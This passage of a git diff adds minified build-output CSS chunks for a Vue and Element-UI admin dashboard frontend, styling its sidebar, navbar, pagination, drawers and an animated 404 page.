.el-submenu>.el-submenu__title>span{height:0;width:0;overflow:hidden;visibility:hidden;display:inline-block}#app .el-menu--collapse .el-menu .el-submenu{min-width:210px!important}#app .mobile .main-container{margin-left:0}#app .mobile .sidebar-container{-webkit-transition:-webkit-transform .28s;transition:-webkit-transform .28s;transition:transform .28s;transition:transform .28s,-webkit-transform .28s;width:210px!important}#app .mobile.hideSidebar .sidebar-container{pointer-events:none;-webkit-transition-duration:.3s;transition-duration:.3s;-webkit-transform:translate3d(-210px,0,0);transform:translate3d(-210px,0,0)}#app .withoutAnimation .main-container,#app .withoutAnimation .sidebar-container{-webkit-transition:none;transition:none}.el-menu--vertical>.el-menu .svg-icon{margin-right:16px}.el-menu--vertical>.el-menu .sub-el-icon{margin-right:12px;margin-left:-2px}.el-menu--vertical .el-menu-item:hover,.el-menu--vertical .nest-menu .el-submenu>.el-submenu__title:hover{background-color:#263445!important}.el-menu--vertical>.el-menu--popup{max-height:100vh;overflow-y:auto}.el-menu--vertical>.el-menu--popup::-webkit-scrollbar-track-piece{background:#d3dce6}.el-menu--vertical>.el-menu--popup::-webkit-scrollbar{width:6px}.el-menu--vertical>.el-menu--popup::-webkit-scrollbar-thumb{background:#99a9bf;border-radius:20px}body{height:100%;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;text-rendering:optimizeLegibility;font-family:Helvetica Neue,Helvetica,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Arial,sans-serif}label{font-weight:700}html{-webkit-box-sizing:border-box;box-sizing:border-box}#app,html{height:100%}*,:after,:before{-webkit-box-sizing:inherit;box-sizing:inherit}a:active,a:focus{outline:none}a,a:focus,a:hover{cursor:pointer;color:inherit;text-decoration:none}div:focus{outline:none}.clearfix:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}.app-container{padding:20px}.app-breadcrumb.el-breadcrumb[data-v-09ba5680]{display:inline-block;font-size:14px;line-height:50px;margin-left:8px}.app-breadcrumb.el-breadcrumb .no-redirect[data-v-09ba5680]{color:#97a8be;cursor:text}.hamburger[data-v-49e15297]{display:inline-block;vertical-align:middle;width:20px;height:20px}.hamburger.is-active[data-v-49e15297]{-webkit-transform:rotate(180deg);transform:rotate(180deg)}.navbar[data-v-43d1048f]{height:50px;overflow:hidden;position:relative;background:#fff;-webkit-box-shadow:0 1px 4px rgba(0,21,41,.08);box-shadow:0 1px 4px rgba(0,21,41,.08)}.navbar .hamburger-container[data-v-43d1048f]{line-height:46px;height:100%;float:left;cursor:pointer;-webkit-transition:background .3s;transition:background .3s;-webkit-tap-highlight-color:transparent}.navbar .hamburger-container[data-v-43d1048f]:hover{background:rgba(0,0,0,.025)}.navbar .breadcrumb-container[data-v-43d1048f]{float:left}.navbar .right-menu[data-v-43d1048f]{float:right;height:100%;line-height:50px}.navbar .right-menu[data-v-43d1048f]:focus{outline:none}.navbar .right-menu .right-menu-item[data-v-43d1048f]{display:inline-block;padding:0 8px;height:100%;font-size:18px;color:#5a5e66;vertical-align:text-bottom}.navbar .right-menu .right-menu-item.hover-effect[data-v-43d1048f]{cursor:pointer;-webkit-transition:background .3s;transition:background .3s}.navbar .right-menu .right-menu-item.hover-effect[data-v-43d1048f]:hover{background:rgba(0,0,0,.025)}.navbar .right-menu .avatar-container[data-v-43d1048f]{margin-right:30px}.navbar .right-menu .avatar-container .avatar-wrapper[data-v-43d1048f]{margin-top:5px;position:relative}.navbar .right-menu .avatar-container .avatar-wrapper .user-avatar[data-v-43d1048f]{cursor:pointer;width:35px;height:35px;border-radius:10px}.navbar .right-menu .avatar-container .avatar-wrapper .el-icon-caret-bottom[data-v-43d1048f]{cursor:pointer;position:absolute;right:-20px;top:25px;font-size:12px}.sidebarLogoFade-enter-active[data-v-a0bdae54]{-webkit-transition:opacity 1.5s;transition:opacity 1.5s}.sidebarLogoFade-enter[data-v-a0bdae54],.sidebarLogoFade-leave-to[data-v-a0bdae54]{opacity:0}.sidebar-logo-container[data-v-a0bdae54]{position:relative;width:100%;height:50px;line-height:50px;text-align:center;overflow:hidden}.sidebar-logo-container .sidebar-logo-link[data-v-a0bdae54]{height:100%;width:100%}.sidebar-logo-container .sidebar-logo-link .sidebar-logo[data-v-a0bdae54]{width:32px;height:32px;vertical-align:middle;margin-right:12px;margin-left:-35px}.sidebar-logo-container .sidebar-logo-link .sidebar-title[data-v-a0bdae54]{display:inline-block;margin:0;color:#fff;font-weight:600;line-height:50px;font-size:18px;font-family:Avenir,Helvetica Neue,Arial,Helvetica,sans-serif;vertical-align:middle}.sidebar-logo-container.collapse .sidebar-logo[data-v-a0bdae54]{margin-right:-35px}.sub-el-icon[data-v-18eeea00]{color:currentColor;width:1em;height:1em}.app-main[data-v-64cf4d83]{min-height:calc(100vh - 50px);width:100%;position:relative;overflow:hidden}.fixed-header+.app-main[data-v-64cf4d83]{padding-top:50px}.el-popup-parent--hidden .fixed-header{padding-right:15px}[data-v-4f739cf0]:export{menuText:#bfcbd9;menuActiveText:#409eff;subMenuActiveText:#f4f4f5;menuBg:#304156;menuHover:#263445;subMenuBg:#1f2d3d;subMenuHover:#001528;sideBarWidth:210px}.app-wrapper[data-v-4f739cf0]{position:relative;height:100%;width:100%}.app-wrapper[data-v-4f739cf0]:after{content:"";display:table;clear:both}.app-wrapper.mobile.openSidebar[data-v-4f739cf0]{position:fixed;top:0}.drawer-bg[data-v-4f739cf0]{background:#000;opacity:.3;width:100%;top:0;height:100%;position:absolute;z-index:999}.fixed-header[data-v-4f739cf0]{position:fixed;top:0;right:0;z-index:9;width:calc(100% - 210px);-webkit-transition:width .28s;transition:width .28s}.hideSidebar .fixed-header[data-v-4f739cf0]{width:calc(100% - 54px)}.mobile .fixed-header[data-v-4f739cf0]{width:100%}.svg-icon[data-v-f9f7fefc]{width:1em;height:1em;vertical-align:-.15em;fill:currentColor;overflow:hidden}.svg-external-icon[data-v-f9f7fefc]{background-color:currentColor;-webkit-mask-size:cover!important;mask-size:cover!important;display:inline-block} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-032a9cb0.21d45376.css b/frontend/dist/static/css/chunk-032a9cb0.21d45376.css new file mode 100644 index 0000000..a4d2c25 --- /dev/null +++ b/frontend/dist/static/css/chunk-032a9cb0.21d45376.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.ipt[data-v-7b4f10d0]{width:250px;height:50px}.clear[data-v-7b4f10d0]{clear:both}.box-card[data-v-7b4f10d0]{margin-top:10px}.sp[data-v-7b4f10d0]{float:left}.creatsource[data-v-7b4f10d0]{float:left;margin-right:20px}.xg[data-v-7b4f10d0]{margin-left:150px;margin-top:100px}.fh[data-v-7b4f10d0]{margin-top:70px;margin-left:400px}.desc[data-v-7b4f10d0]{margin-left:50px;margin-top:50px}.shenglue[data-v-7b4f10d0]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-7b4f10d0]{margin-bottom:-10px}.mtcall[data-v-7b4f10d0]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-7b4f10d0]{width:400px;text-align:center}.zzc[data-v-7b4f10d0]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-7b4f10d0]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-7b4f10d0]{margin-left:10px}.mt5[data-v-7b4f10d0]{border:none;color:#2684ff}.m1[data-v-7b4f10d0]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-7b4f10d0]{margin-top:30px;margin-left:30px}.ml10[data-v-7b4f10d0]{margin-left:10px}.ml20[data-v-7b4f10d0]{margin-left:30px}.mqo[data-v-7b4f10d0]{margin-top:8px;margin-right:8px}.demo-drawer__content[data-v-7b4f10d0]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-7b4f10d0]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-7b4f10d0]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer .dropdown[data-v-7b4f10d0],.demo-drawer__footer button[data-v-7b4f10d0]{-webkit-box-flex:1;-ms-flex:1;flex:1}.el-tag--small[data-v-7b4f10d0]{margin:2px}.tip[data-v-7b4f10d0]{padding:8px 16px;background-color:#ecf8ff;border-radius:4px;border-left:5px solid #50bfff;margin:20px 0}.dashboard-container[data-v-7b4f10d0]{margin:30px}.dashboard-text[data-v-7b4f10d0]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-0faed228.9a5af57a.css b/frontend/dist/static/css/chunk-0faed228.9a5af57a.css new file mode 100644 index 0000000..51aee9a --- /dev/null +++ b/frontend/dist/static/css/chunk-0faed228.9a5af57a.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.ipt[data-v-039dff9a]{width:250px;height:50px}.clear[data-v-039dff9a]{clear:both}.box-card[data-v-039dff9a]{margin-top:10px}.sp[data-v-039dff9a]{float:left}.creatsource[data-v-039dff9a]{float:right;margin-right:20px}.xg[data-v-039dff9a]{margin-left:140px;margin-top:100px}.fh[data-v-039dff9a]{margin-top:70px;margin-left:400px}.desc[data-v-039dff9a]{margin-left:50px;margin-top:50px}.shenglue[data-v-039dff9a]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-039dff9a]{margin-bottom:-10px}.mtcall[data-v-039dff9a]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-039dff9a]{width:400px;text-align:center}.zzc[data-v-039dff9a]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-039dff9a]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-039dff9a]{margin-left:10px}.mt5[data-v-039dff9a]{border:none;color:#2684ff}.m1[data-v-039dff9a]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-039dff9a]{margin-top:30px;margin-left:30px}.ml10[data-v-039dff9a]{margin-left:10px}.ml20[data-v-039dff9a]{margin-left:30px}.mqo[data-v-039dff9a]{margin-top:8px;margin-right:8px}.el-drawer__body[data-v-039dff9a]{padding:20px}.demo-drawer__content[data-v-039dff9a]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-039dff9a]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-039dff9a]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer button[data-v-039dff9a]{-webkit-box-flex:1;-ms-flex:1;flex:1}.dashboard-container[data-v-039dff9a]{margin:30px}.dashboard-text[data-v-039dff9a]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-141df175.49fbc4a9.css b/frontend/dist/static/css/chunk-141df175.49fbc4a9.css new file mode 100644 index 0000000..445305d --- /dev/null +++ b/frontend/dist/static/css/chunk-141df175.49fbc4a9.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.rule_s[data-v-064445cc]{width:300px!important;height:100px}.rulefh[data-v-064445cc]{margin-left:40px}.xjrules[data-v-064445cc]{margin-left:150px;margin-top:50px}.syrule[data-v-064445cc]{margin-left:700px}.icon[data-v-064445cc]{width:16px;height:16px;margin-bottom:-4px}.xg[data-v-064445cc]{margin-left:140px;margin-top:50px}.elfrom[data-v-064445cc]{margin-top:10px;margin-left:20px}.ipt[data-v-064445cc]{width:190px;height:50px}.ipt1[data-v-064445cc]{width:300px}.fh[data-v-064445cc]{margin-top:70px;margin-left:400px}.desc[data-v-064445cc]{margin-left:50px;margin-top:50px}.shenglue[data-v-064445cc]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-064445cc]{margin-bottom:-10px}.mtcall[data-v-064445cc]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-064445cc]{width:400px;text-align:center}.zzc[data-v-064445cc]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-064445cc]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-064445cc]{margin-left:10px}.mt5[data-v-064445cc]{border:none;color:#2684ff}.m1[data-v-064445cc]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-064445cc]{margin-top:30px;margin-left:30px}.ml10[data-v-064445cc]{margin-left:10px}.ml20[data-v-064445cc]{margin-left:30px}.mqo[data-v-064445cc]{margin-top:8px;margin-right:8px}.el-drawer__body[data-v-064445cc]{padding:20px}.demo-drawer__content[data-v-064445cc]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-064445cc]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-064445cc]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer button[data-v-064445cc]{-webkit-box-flex:1;-ms-flex:1;flex:1}.sbadge[data-v-064445cc]{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:middle;background-color:#777;border-radius:10px}.dashboard-container[data-v-064445cc]{margin:30px}.dashboard-text[data-v-064445cc]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-1c1b1da2.da401690.css b/frontend/dist/static/css/chunk-1c1b1da2.da401690.css new file mode 100644 index 0000000..e7bbe7c --- /dev/null +++ b/frontend/dist/static/css/chunk-1c1b1da2.da401690.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.ipt[data-v-75df91b8]{width:250px;height:50px}.clear[data-v-75df91b8]{clear:both}.box-card[data-v-75df91b8]{margin-top:10px}.sp[data-v-75df91b8]{float:left}.creatsource[data-v-75df91b8]{float:left;margin-right:20px}.xg[data-v-75df91b8]{margin-left:150px;margin-top:100px}.fh[data-v-75df91b8]{margin-top:70px;margin-left:400px}.desc[data-v-75df91b8]{margin-left:50px;margin-top:50px}.shenglue[data-v-75df91b8]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-75df91b8]{margin-bottom:-10px}.mtcall[data-v-75df91b8]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-75df91b8]{width:400px;text-align:center}.zzc[data-v-75df91b8]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-75df91b8]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-75df91b8]{margin-left:10px}.mt5[data-v-75df91b8]{border:none;color:#2684ff}.m1[data-v-75df91b8]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-75df91b8]{margin-top:30px;margin-left:30px}.ml10[data-v-75df91b8]{margin-left:10px}.ml20[data-v-75df91b8]{margin-left:30px}.mqo[data-v-75df91b8]{margin-top:8px;margin-right:8px}.demo-drawer__content[data-v-75df91b8]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-75df91b8]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-75df91b8]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer .dropdown[data-v-75df91b8],.demo-drawer__footer button[data-v-75df91b8]{-webkit-box-flex:1;-ms-flex:1;flex:1}.el-tag--small[data-v-75df91b8]{margin:2px}.tip[data-v-75df91b8]{padding:8px 16px;background-color:#ecf8ff;border-radius:4px;border-left:5px solid #50bfff;margin:20px 0}.dashboard-container[data-v-75df91b8]{margin:30px}.dashboard-text[data-v-75df91b8]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-238c903c.3c7f5ad9.css b/frontend/dist/static/css/chunk-238c903c.3c7f5ad9.css new file mode 100644 index 0000000..5adab28 --- /dev/null +++ b/frontend/dist/static/css/chunk-238c903c.3c7f5ad9.css @@ -0,0 +1 @@ +.wscn-http404-container[data-v-c095f994]{-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);position:absolute;top:40%;left:50%}.wscn-http404[data-v-c095f994]{position:relative;width:1200px;padding:0 50px;overflow:hidden}.wscn-http404 .pic-404[data-v-c095f994]{position:relative;float:left;width:600px;overflow:hidden}.wscn-http404 .pic-404__parent[data-v-c095f994]{width:100%}.wscn-http404 .pic-404__child[data-v-c095f994]{position:absolute}.wscn-http404 .pic-404__child.left[data-v-c095f994]{width:80px;top:17px;left:220px;opacity:0;-webkit-animation-name:cloudLeft-data-v-c095f994;animation-name:cloudLeft-data-v-c095f994;-webkit-animation-duration:2s;animation-duration:2s;-webkit-animation-timing-function:linear;animation-timing-function:linear;-webkit-animation-fill-mode:forwards;animation-fill-mode:forwards;-webkit-animation-delay:1s;animation-delay:1s}.wscn-http404 .pic-404__child.mid[data-v-c095f994]{width:46px;top:10px;left:420px;opacity:0;-webkit-animation-name:cloudMid-data-v-c095f994;animation-name:cloudMid-data-v-c095f994;-webkit-animation-duration:2s;animation-duration:2s;-webkit-animation-timing-function:linear;animation-timing-function:linear;-webkit-animation-fill-mode:forwards;animation-fill-mode:forwards;-webkit-animation-delay:1.2s;animation-delay:1.2s}.wscn-http404 .pic-404__child.right[data-v-c095f994]{width:62px;top:100px;left:500px;opacity:0;-webkit-animation-name:cloudRight-data-v-c095f994;animation-name:cloudRight-data-v-c095f994;-webkit-animation-duration:2s;animation-duration:2s;-webkit-animation-timing-function:linear;animation-timing-function:linear;-webkit-animation-fill-mode:forwards;animation-fill-mode:forwards;-webkit-animation-delay:1s;animation-delay:1s}@-webkit-keyframes cloudLeft-data-v-c095f994{0%{top:17px;left:220px;opacity:0}20%{top:33px;left:188px;opacity:1}80%{top:81px;left:92px;opacity:1}to{top:97px;left:60px;opacity:0}}@keyframes cloudLeft-data-v-c095f994{0%{top:17px;left:220px;opacity:0}20%{top:33px;left:188px;opacity:1}80%{top:81px;left:92px;opacity:1}to{top:97px;left:60px;opacity:0}}@-webkit-keyframes cloudMid-data-v-c095f994{0%{top:10px;left:420px;opacity:0}20%{top:40px;left:360px;opacity:1}70%{top:130px;left:180px;opacity:1}to{top:160px;left:120px;opacity:0}}@keyframes cloudMid-data-v-c095f994{0%{top:10px;left:420px;opacity:0}20%{top:40px;left:360px;opacity:1}70%{top:130px;left:180px;opacity:1}to{top:160px;left:120px;opacity:0}}@-webkit-keyframes cloudRight-data-v-c095f994{0%{top:100px;left:500px;opacity:0}20%{top:120px;left:460px;opacity:1}80%{top:180px;left:340px;opacity:1}to{top:200px;left:300px;opacity:0}}@keyframes cloudRight-data-v-c095f994{0%{top:100px;left:500px;opacity:0}20%{top:120px;left:460px;opacity:1}80%{top:180px;left:340px;opacity:1}to{top:200px;left:300px;opacity:0}}.wscn-http404 .bullshit[data-v-c095f994]{position:relative;float:left;width:300px;padding:30px 0;overflow:hidden}.wscn-http404 .bullshit__oops[data-v-c095f994]{font-size:32px;line-height:40px;color:#1482f0;margin-bottom:20px;-webkit-animation-fill-mode:forwards;animation-fill-mode:forwards}.wscn-http404 .bullshit__headline[data-v-c095f994],.wscn-http404 .bullshit__oops[data-v-c095f994]{font-weight:700;opacity:0;-webkit-animation-name:slideUp-data-v-c095f994;animation-name:slideUp-data-v-c095f994;-webkit-animation-duration:.5s;animation-duration:.5s}.wscn-http404 .bullshit__headline[data-v-c095f994]{font-size:20px;line-height:24px;color:#222;margin-bottom:10px;-webkit-animation-delay:.1s;animation-delay:.1s;-webkit-animation-fill-mode:forwards;animation-fill-mode:forwards}.wscn-http404 .bullshit__info[data-v-c095f994]{font-size:13px;line-height:21px;color:grey;margin-bottom:30px;-webkit-animation-delay:.2s;animation-delay:.2s;-webkit-animation-fill-mode:forwards;animation-fill-mode:forwards}.wscn-http404 .bullshit__info[data-v-c095f994],.wscn-http404 .bullshit__return-home[data-v-c095f994]{opacity:0;-webkit-animation-name:slideUp-data-v-c095f994;animation-name:slideUp-data-v-c095f994;-webkit-animation-duration:.5s;animation-duration:.5s}.wscn-http404 .bullshit__return-home[data-v-c095f994]{display:block;float:left;width:110px;height:36px;background:#1482f0;border-radius:100px;text-align:center;color:#fff;font-size:14px;line-height:36px;cursor:pointer;-webkit-animation-delay:.3s;animation-delay:.3s;-webkit-animation-fill-mode:forwards;animation-fill-mode:forwards}@-webkit-keyframes slideUp-data-v-c095f994{0%{-webkit-transform:translateY(60px);transform:translateY(60px);opacity:0}to{-webkit-transform:translateY(0);transform:translateY(0);opacity:1}}@keyframes slideUp-data-v-c095f994{0%{-webkit-transform:translateY(60px);transform:translateY(60px);opacity:0}to{-webkit-transform:translateY(0);transform:translateY(0);opacity:1}} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-2db16da6.d167eee3.css b/frontend/dist/static/css/chunk-2db16da6.d167eee3.css new file mode 100644 index 0000000..f52c4f7 --- /dev/null +++ b/frontend/dist/static/css/chunk-2db16da6.d167eee3.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.ipt[data-v-2cb95120]{width:250px;height:50px}.clear[data-v-2cb95120]{clear:both}.box-card[data-v-2cb95120]{margin-top:10px}.sp[data-v-2cb95120]{float:left}.creatsource[data-v-2cb95120]{float:left;margin-right:20px}.xg[data-v-2cb95120]{margin-left:150px;margin-top:100px}.fh[data-v-2cb95120]{margin-top:70px;margin-left:400px}.desc[data-v-2cb95120]{margin-left:50px;margin-top:50px}.shenglue[data-v-2cb95120]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-2cb95120]{margin-bottom:-10px}.mtcall[data-v-2cb95120]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-2cb95120]{width:400px;text-align:center}.zzc[data-v-2cb95120]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-2cb95120]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-2cb95120]{margin-left:10px}.mt5[data-v-2cb95120]{border:none;color:#2684ff}.m1[data-v-2cb95120]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-2cb95120]{margin-top:30px;margin-left:30px}.ml10[data-v-2cb95120]{margin-left:10px}.ml20[data-v-2cb95120]{margin-left:30px}.mqo[data-v-2cb95120]{margin-top:8px;margin-right:8px}.demo-drawer__content[data-v-2cb95120]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-2cb95120]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-2cb95120]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer .dropdown[data-v-2cb95120],.demo-drawer__footer button[data-v-2cb95120]{-webkit-box-flex:1;-ms-flex:1;flex:1}.el-tag--small[data-v-2cb95120]{margin:2px}.tip[data-v-2cb95120]{padding:8px 16px;background-color:#ecf8ff;border-radius:4px;border-left:5px solid #50bfff;margin:20px 0}.sbadge[data-v-2cb95120]{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:middle;background-color:#777;border-radius:10px}.dashboard-container[data-v-2cb95120]{margin:30px}.dashboard-text[data-v-2cb95120]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-30f4db1c.8c41eac0.css b/frontend/dist/static/css/chunk-30f4db1c.8c41eac0.css new file mode 100644 index 0000000..6ca1512 --- /dev/null +++ b/frontend/dist/static/css/chunk-30f4db1c.8c41eac0.css @@ -0,0 +1 @@ +.headers[data-v-30034e8f]{margin-top:-20px}.input-wd[data-v-30034e8f]{margin-top:10px}.demo-shadow[data-v-30034e8f]{-webkit-box-shadow:rgba(0,0,0,.1) 0 2px 12px 0;box-shadow:0 2px 12px 0 rgba(0,0,0,.1)}.dashboard-container[data-v-30034e8f]{margin:30px}.dashboard-text[data-v-30034e8f]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-32e31cb7.0ba417b4.css b/frontend/dist/static/css/chunk-32e31cb7.0ba417b4.css new file mode 100644 index 0000000..598a686 --- /dev/null +++ b/frontend/dist/static/css/chunk-32e31cb7.0ba417b4.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.ipt[data-v-498e19f3]{width:250px;height:50px}.clear[data-v-498e19f3]{clear:both}.box-card[data-v-498e19f3]{margin-top:10px}.sp[data-v-498e19f3]{float:left}.creatsource[data-v-498e19f3]{float:left;margin-right:20px}.xg[data-v-498e19f3]{margin-left:150px;margin-top:100px}.fh[data-v-498e19f3]{margin-top:70px;margin-left:400px}.desc[data-v-498e19f3]{margin-left:50px;margin-top:50px}.shenglue[data-v-498e19f3]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-498e19f3]{margin-bottom:-10px}.mtcall[data-v-498e19f3]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-498e19f3]{width:400px;text-align:center}.zzc[data-v-498e19f3]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-498e19f3]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-498e19f3]{margin-left:10px}.mt5[data-v-498e19f3]{border:none;color:#2684ff}.m1[data-v-498e19f3]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-498e19f3]{margin-top:30px;margin-left:30px}.ml10[data-v-498e19f3]{margin-left:10px}.ml20[data-v-498e19f3]{margin-left:30px}.mqo[data-v-498e19f3]{margin-top:8px;margin-right:8px}.demo-drawer__content[data-v-498e19f3]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-498e19f3]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-498e19f3]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer .dropdown[data-v-498e19f3],.demo-drawer__footer button[data-v-498e19f3]{-webkit-box-flex:1;-ms-flex:1;flex:1}.el-tag--small[data-v-498e19f3]{margin:2px}.dashboard-container[data-v-498e19f3]{margin:30px}.dashboard-text[data-v-498e19f3]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-3d70723b.f4791d4a.css b/frontend/dist/static/css/chunk-3d70723b.f4791d4a.css new file mode 100644 index 0000000..f4dd23a --- /dev/null +++ b/frontend/dist/static/css/chunk-3d70723b.f4791d4a.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 